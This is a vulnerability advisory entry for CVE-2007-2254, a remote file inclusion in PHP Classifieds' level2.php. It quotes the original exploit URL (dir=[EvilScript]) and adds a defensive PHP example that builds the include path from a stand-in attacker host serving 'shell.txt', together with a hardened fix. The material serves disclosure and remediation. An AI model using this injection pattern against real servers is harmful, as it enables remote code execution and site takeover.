PHP Classifieds 'level2.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1190833    Type: Unknown
Published: 2007-04-25    Updated: 2007-04-25
CVE: CVE-2007-2254    CNNVD-ID: CNNVD-200704-501
Platform: N/A    CVSS score: 7.5
|Sources
https://www.securityfocus.com/bid/86297
https://cxsecurity.com/issue/WLB-2007040125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-501
|Details
admin/setup/level2.php in PHP Classifieds builds an include path from the variable $dir (require("$dir/admin/dp.php")) without initialising it. A remote attacker who can get a request parameter named dir into that variable (through register_globals, or any equivalent import of request variables into the script's scope) controls the require() target: a URL value makes PHP fetch and execute arbitrary PHP code from the attacker's server when remote includes are permitted (allow_url_fopen, or allow_url_include on PHP 5.2 and later), and a local path or traversal sequence includes files already on the host. The original Bugtraq post named the script "Allfaclassfieds"; the VIM follow-up cited below identifies the affected product as DeltaScripts PHP Classifieds.
|Exploit
Allfaclassfieds (level2.php dir) remote file inclusion

--
 Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
 ---

Script: allfaclassfieds

Download: http://scriptat.com/download.php?sid=718
 --

Bug File: level2.php

Bug code in line 4:
 require("$dir/admin/dp.php");

--

Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]

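The flaw described in the advisory above, as an added example that is not part of the original post or of the PHP Classifieds code base: the reported include pattern next to a hardened replacement. The attacker host, the directory layout relative to admin/setup and the function names are assumptions made for the illustration.

```php
<?php
// Added example, not code from PHP Classifieds or from the advisory above.
// It reproduces the shape of the flaw on line 4 of admin/setup/level2.php
// (an include path built from a variable the script never initialises) and
// shows a hardened replacement. The attacker host, the directory layout and
// the function names are assumptions made for the illustration.

// 1. The reported pattern. In level2.php $dir is assigned nowhere, so it is
//    only set when PHP copies request parameters into globals
//    (register_globals=On, the default before PHP 4.2.0). The parameter here
//    stands in for that injected value.
function vulnerable_include_target($dir)
{
    // Original line: require("$dir/admin/dp.php");
    return "$dir/admin/dp.php";
}

// 2. Hardened form: never derive the path from the request. Anchor it on the
//    script's own location; realpath() resolves ".." and symlinks, returns
//    false for paths that do not exist (including stream wrappers such as
//    http://), and the prefix check rejects anything outside the install tree.
function hardened_include_target($scriptDir)
{
    $root   = realpath($scriptDir . '/../..');      // admin/setup -> install root (assumed layout)
    $target = realpath($root . '/admin/dp.php');
    if ($root === false || $target === false
        || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                 // refuse instead of including something unexpected
    }
    return $target;
}

// Demonstration with the advisory's request, level2.php?dir=[EvilScript].
// The trailing "?" makes PHP treat the appended "/admin/dp.php" as a query
// string, so the whole value resolves to the attacker's file; PHP fetches and
// executes it when allow_url_fopen (or allow_url_include on PHP >= 5.2) is on.
$evil = 'http://attacker.example/shell.txt?';
echo "vulnerable require() target: ", vulnerable_include_target($evil), "\n";

$safe = hardened_include_target(__DIR__);
echo "hardened require() target: ", ($safe === null ? 'refused' : $safe), "\n";
```

Run it with the PHP CLI from any directory; the hardened branch prints "refused" unless an admin/dp.php actually exists two levels above the script, which is the intended behaviour. Fixing the include is the code-level repair; on the server side, register_globals=Off removes the injection route and allow_url_include=Off (allow_url_fopen=Off on PHP before 5.2) closes the remote vector for every script at once.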
|Affected products
DeltaScripts PHP Classifieds 6.04
|References

Source: BUGTRAQ
Name: 20070422 Allfaclassfieds (level2.php dir) remote file inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/466648/100/0/threaded
Source: VIM
Name: 20070425 [false but true] "Allfaclassfieds" RFI no; PHP Classifieds yes
Link: http://www.attrition.org/pipermail/vim/2007-April/001543.html
Source: XF
Name: allfaclassfieds-level2-file-include (33798)
Link: http://xforce.iss.net/xforce/xfdb/33798
Source: SREASON
Name: 2618
Link: http://securityreason.com/securityalert/2618